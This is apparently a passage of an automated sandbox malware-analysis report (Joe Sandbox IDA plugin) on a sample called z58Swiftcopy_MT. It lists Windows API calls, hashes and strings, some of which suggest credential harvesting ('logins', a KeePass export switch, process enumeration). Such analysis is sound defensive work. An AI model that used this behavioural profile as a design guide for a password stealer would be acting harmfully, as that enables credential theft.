                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                                                      • String ID: logins$null
                                                                                                                                                                                                                                      • API String ID: 2148543256-2163367763
                                                                                                                                                                                                                                      • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                                                                                      • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                      • String ID: ---
                                                                                                                                                                                                                                      • API String ID: 3437578500-2854292027
                                                                                                                                                                                                                                      • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                                                                                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1010922700-0
                                                                                                                                                                                                                                      • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                                                                                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                                      • free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                                                      • free.MSVCRT ref: 004186E0
                                                                                                                                                                                                                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00418716
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0041872A
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00418749
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                                                                      • String ID: |A
                                                                                                                                                                                                                                      • API String ID: 3356672799-1717621600
                                                                                                                                                                                                                                      • Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                                                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                                      • API String ID: 2081463915-1959339147
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                      • API String ID: 2012295524-70141382
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 667068680-3953557276
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1700100422-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 552707033-0
                                                                                                                                                                                                                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                                                      • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                                                      • String ID: 4$h
                                                                                                                                                                                                                                      • API String ID: 4066021378-1856150674
                                                                                                                                                                                                                                      • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                                                                                                                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                                                                                                      • String ID: %%0.%df
                                                                                                                                                                                                                                      • API String ID: 3473751417-763548558
                                                                                                                                                                                                                                      • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                                                                                                                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                                                      • String ID: A
                                                                                                                                                                                                                                      • API String ID: 2892645895-3554254475
                                                                                                                                                                                                                                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                                      • String ID: caption
